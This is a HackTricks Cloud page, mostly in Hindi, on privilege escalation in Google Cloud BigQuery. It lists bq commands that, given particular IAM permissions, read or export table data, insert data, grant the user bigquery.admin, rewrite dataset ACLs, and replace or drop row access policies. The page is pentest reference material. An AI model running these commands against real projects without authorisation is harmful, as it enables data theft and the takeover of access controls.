GCP - BigQuery Privesc

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

BigQuery

BigQuery के बारे में अधिक जानकारी के लिए देखें:

GCP - Bigquery Enum

Read Table

BigQuery तालिका के अंदर संग्रहीत जानकारी को पढ़ने से संवेदनशील जानकारी मिलना संभव हो सकता है। जानकारी तक पहुँचने के लिए आवश्यक अनुमति bigquery.tables.get, bigquery.jobs.create और bigquery.tables.getData है:

bq head <dataset>.<table>
bq query --nouse_legacy_sql 'SELECT * FROM `<proj>.<dataset>.<table-name>` LIMIT 1000'

Export data

यह डेटा तक पहुँचने का एक और तरीका है। इसे एक क्लाउड स्टोरेज बकेट में निर्यात करें और जानकारी के साथ फ़ाइलें डाउनलोड करें। इस क्रिया को करने के लिए निम्नलिखित अनुमतियों की आवश्यकता है: bigquery.tables.export, bigquery.jobs.create और storage.objects.create।

bq extract <dataset>.<table> "gs://<bucket>/table*.csv"

Insert data

यह संभव है कि कुछ विश्वसनीय डेटा को Bigquery तालिका में किसी अन्य स्थान में एक कमजोरियों का दुरुपयोग करने के लिए पेश किया जाए। यह अनुमतियों bigquery.tables.get, bigquery.tables.updateData और bigquery.jobs.create के साथ आसानी से किया जा सकता है:

# Via query
bq query --nouse_legacy_sql 'INSERT INTO `<proj>.<dataset>.<table-name>` (rank, refresh_date, dma_name, dma_id, term, week, score) VALUES (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2019-10-13", 62), (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2020-05-24", 67)'

# Via insert param
bq insert dataset.table /tmp/mydata.json

`bigquery.datasets.setIamPolicy`

एक हमलावर इस विशेषाधिकार का दुरुपयोग करके अपने लिए और अधिक अनुमतियाँ एक BigQuery डेटासेट पर दे सकता है:

# For this you also need bigquery.tables.getIamPolicy
bq add-iam-policy-binding \
--member='user:<email>' \
--role='roles/bigquery.admin' \
<proj>:<dataset>

# use the set-iam-policy if you don't have bigquery.tables.getIamPolicy

`bigquery.datasets.update`, (`bigquery.datasets.get`)

बस यह अनुमति एक BigQuery डेटासेट पर अपने एक्सेस को ACLs को संशोधित करके अपडेट करने की अनुमति देती है जो यह दर्शाती है कि कौन इसे एक्सेस कर सकता है:

# Download current permissions, reqires bigquery.datasets.get
bq show --format=prettyjson <proj>:<dataset> > acl.json
## Give permissions to the desired user
bq update --source acl.json <proj>:<dataset>
## Read it with
bq head $PROJECT_ID:<dataset>.<table>

`bigquery.tables.setIamPolicy`

एक हमलावर इस विशेषाधिकार का दुरुपयोग करके अपने लिए और अधिक अनुमतियाँ एक BigQuery तालिका पर दे सकता है:

# For this you also need bigquery.tables.setIamPolicy
bq add-iam-policy-binding \
--member='user:<email>' \
--role='roles/bigquery.admin' \
<proj>:<dataset>.<table>

# use the set-iam-policy if you don't have bigquery.tables.setIamPolicy

`bigquery.rowAccessPolicies.update`, `bigquery.rowAccessPolicies.setIamPolicy`, `bigquery.tables.getData`, `bigquery.jobs.create`

दस्तावेज़ों के अनुसार, उल्लेखित अनुमतियों के साथ एक पंक्ति नीति को अपडेट करना संभव है। हालांकि, cli bq का उपयोग करते समय आपको कुछ और चाहिए: bigquery.rowAccessPolicies.create, bigquery.tables.get.

bq query --nouse_legacy_sql 'CREATE OR REPLACE ROW ACCESS POLICY <filter_id> ON `<proj>.<dataset-name>.<table-name>` GRANT TO ("<user:user@email.xyz>") FILTER USING (term = "Cfba");' # A example filter was used

यह संभव है कि पंक्ति नीतियों की गणना के आउटपुट में फ़िल्टर आईडी को पाया जा सके। उदाहरण:

bq ls --row_access_policies <proj>:<dataset>.<table>

Id        Filter Predicate            Grantees              Creation Time    Last Modified Time
------------- ------------------ ----------------------------- ----------------- --------------------
apac_filter   term = "Cfba"      user:asd@hacktricks.xyz   21 Jan 23:32:09   21 Jan 23:32:09

यदि आपके पास bigquery.rowAccessPolicies.delete है बजाय bigquery.rowAccessPolicies.update के, तो आप नीति को बस हटा भी सकते हैं:

# Remove one
bq query --nouse_legacy_sql 'DROP ALL ROW ACCESS POLICY <policy_id> ON `<proj>.<dataset-name>.<table-name>`;'

# Remove all (if it's the last row policy you need to use this
bq query --nouse_legacy_sql 'DROP ALL ROW ACCESS POLICIES ON `<proj>.<dataset-name>.<table-name>`;'

पंक्ति पहुंच नीतियों को बायपास करने का एक और संभावित विकल्प प्रतिबंधित डेटा के मान को बस बदलना होगा। यदि आप केवल तब देख सकते हैं जब term Cfba है, तो बस तालिका के सभी रिकॉर्ड को term = "Cfba" में संशोधित करें। हालांकि, यह bigquery द्वारा रोका गया है।

HackTricks का समर्थन करें

सदस्यता योजनाओं की जांच करें!
हमारे 💬 Discord समूह या telegram समूह में शामिल हों या Twitter 🐦 पर हमें फॉलो करें @hacktricks_live.
हैकिंग ट्रिक्स साझा करें और HackTricks और HackTricks Cloud github रिपोजिटरी में PR सबमिट करें।

PreviousGCP - Batch Privesc NextGCP - ClientAuthConfig Privesc

Last updated 8 days ago

BigQuery

Read Table

Export data

Insert data

bigquery.datasets.setIamPolicy

bigquery.datasets.update, (bigquery.datasets.get)

bigquery.tables.setIamPolicy

bigquery.rowAccessPolicies.update, bigquery.rowAccessPolicies.setIamPolicy, bigquery.tables.getData, bigquery.jobs.create

BigQuery

Read Table

Export data

Insert data

bigquery.datasets.setIamPolicy

bigquery.datasets.update, (bigquery.datasets.get)

bigquery.tables.setIamPolicy

bigquery.rowAccessPolicies.update, bigquery.rowAccessPolicies.setIamPolicy, bigquery.tables.getData, bigquery.jobs.create

`bigquery.datasets.setIamPolicy`

`bigquery.datasets.update`, (`bigquery.datasets.get`)

`bigquery.tables.setIamPolicy`

`bigquery.rowAccessPolicies.update`, `bigquery.rowAccessPolicies.setIamPolicy`, `bigquery.tables.getData`, `bigquery.jobs.create`

`bigquery.datasets.setIamPolicy`

`bigquery.datasets.update`, (`bigquery.datasets.get`)

`bigquery.tables.setIamPolicy`

`bigquery.rowAccessPolicies.update`, `bigquery.rowAccessPolicies.setIamPolicy`, `bigquery.tables.getData`, `bigquery.jobs.create`